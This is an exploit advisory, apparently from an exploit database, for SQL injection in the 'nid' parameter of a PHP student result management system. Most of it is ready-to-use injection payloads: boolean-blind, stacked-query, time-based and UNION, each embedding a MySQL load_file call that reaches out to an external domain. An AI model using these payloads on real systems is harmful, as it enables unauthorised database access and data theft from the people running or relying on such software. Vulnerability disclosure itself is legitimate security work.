Share
## https://sploitus.com/exploit?id=PACKETSTORM:182359
## Titles: UP-RESULT[pro-1.0] Multiple-SQLi  
## Author: nu11secur1ty  
## Date: 10/28/2024  
## Vendor: https://mayurik.com/  
## Software:  
https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download  
## Reference: https://portswigger.net/web-security/sql-injection  
  
## Description:  
The `nid` parameter appears to be vulnerable to SQL injection attacks. The  
payload '+(select load_file('\\\\  
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+' was  
submitted in the nid parameter. This payload injects a SQL sub-query that  
calls MySQL's load_file function with a UNC file path that references a URL  
on an external domain. The application interacted with that domain,  
indicating that the injected SQL query was executed. The attacker can get  
all sensitive information from this system when he attacks it online!  
  
STATUS: HIGH- Vulnerability  
  
  
[+]Exploits:  
- SQLi Multiple:  
```mysql  
---  
Parameter: nid (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: nid=2'+(select load_file('\\\\  
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' OR NOT  
9142=9142 AND 'bbjg'='bbjg  
  
Type: stacked queries  
Title: MySQL >= 5.0.12 stacked queries (comment)  
Payload: nid=2'+(select load_file('\\\\  
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'';SELECT  
SLEEP(7)#  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: nid=2'+(select load_file('\\\\  
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' AND  
(SELECT 9083 FROM (SELECT(SLEEP(7)))YMvG) AND 'jiLE'='jiLE  
  
Type: UNION query  
Title: MySQL UNION query (NULL) - 3 columns  
Payload: nid=2'+(select load_file('\\\\  
p2scekbx5ka4v4drqw3isn2svj1cp5dwgk77xvm.tupa_putka.com\\eej'))+'' UNION ALL  
SELECT  
NULL,CONCAT(0x7178767871,0x6467686f7670716c49467649584a4744416775554961485747416c4b724977454f75787267707268,0x7162627a71),NULL,NULL#  
---  
```  
  
## Reproduce:  
[href](https://www.patreon.com/posts/up-result-pro-1-114856979)  
  
## Demo PoC:  
[href](  
https://www.nu11secur1ty.com/2024/10/up-resultpro-10-multiple-sqli.html)  
  
## Time spent:  
01:27:00